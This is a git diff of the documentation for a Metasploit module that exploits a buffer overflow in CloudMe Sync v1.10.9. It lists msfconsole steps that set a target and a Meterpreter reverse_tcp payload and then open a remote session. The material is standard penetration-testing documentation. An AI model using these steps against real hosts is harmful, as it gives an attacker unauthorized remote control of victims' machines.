|
| 1 | +## Description |
| 2 | +This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe). |
1 | 3 |
|
2 | 4 | ## Verification Steps
|
3 | 5 | 1. Install CloudMe for Desktop version `v1.10.9`
|
4 |
| - 2. Create a free account and start the applicaton |
5 |
| - 6. Start `msfconsole` |
| 6 | + 2. Start the applicaton (you don't need to create an account) |
| 7 | + 3. Start `msfconsole` |
6 | 8 | 4. Do `use exploit/windows/misc/cloudme_sync`
|
7 | 9 | 5. Do `set RHOST ip`
|
8 |
| - 11. Do `set PAYLOAD windows/meterpreter/reverse_tcp` |
9 |
| - 12. Do `set LHOST ip` |
10 |
| - 13. Do `exploit` |
11 |
| - 14. Verify the Meterpreter session is opened |
| 10 | + 6. Do `set LHOST ip` |
| 11 | + 7. Do `exploit` |
| 12 | + 8. Verify the Meterpreter session is opened |
12 | 13 |
|
13 | 14 | ## Scenarios
|
14 | 15 |
|
15 |
| -### CloudMe Sync client application on Windows 7 SP1 |
| 16 | +### CloudMe Sync client application on Windows 7 SP1 x86 |
16 | 17 |
|
17 | 18 | ```
|
18 | 19 | msf > use exploit/windows/misc/cloudme_sync
|
19 |
| -msf exploit(windows/misc/cloudme_sync) > show options |
20 |
| -
|
21 |
| -Module options (exploit/windows/misc/cloudme_sync): |
22 |
| -
|
23 |
| - Name Current Setting Required Description |
24 |
| - ---- --------------- -------- ----------- |
25 |
| - RHOST 172.16.40.148 yes The target address |
26 |
| - RPORT 8888 yes The target port (TCP) |
27 |
| -
|
28 |
| -
|
29 |
| -Payload options (windows/meterpreter/reverse_tcp): |
30 |
| -
|
31 |
| - Name Current Setting Required Description |
32 |
| - ---- --------------- -------- ----------- |
33 |
| - EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) |
34 |
| - LHOST 172.16.40.5 yes The listen address |
35 |
| - LPORT 4444 yes The listen port |
36 |
| -
|
37 |
| -
|
38 |
| -Exploit target: |
39 |
| -
|
40 |
| - Id Name |
41 |
| - -- ---- |
42 |
| - 0 CloudMe Sync v1.10.9 |
43 |
| -
|
44 |
| -
|
45 | 20 | msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
|
46 | 21 | RHOST => 172.16.40.148
|
47 | 22 | msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
|
|
0 commit comments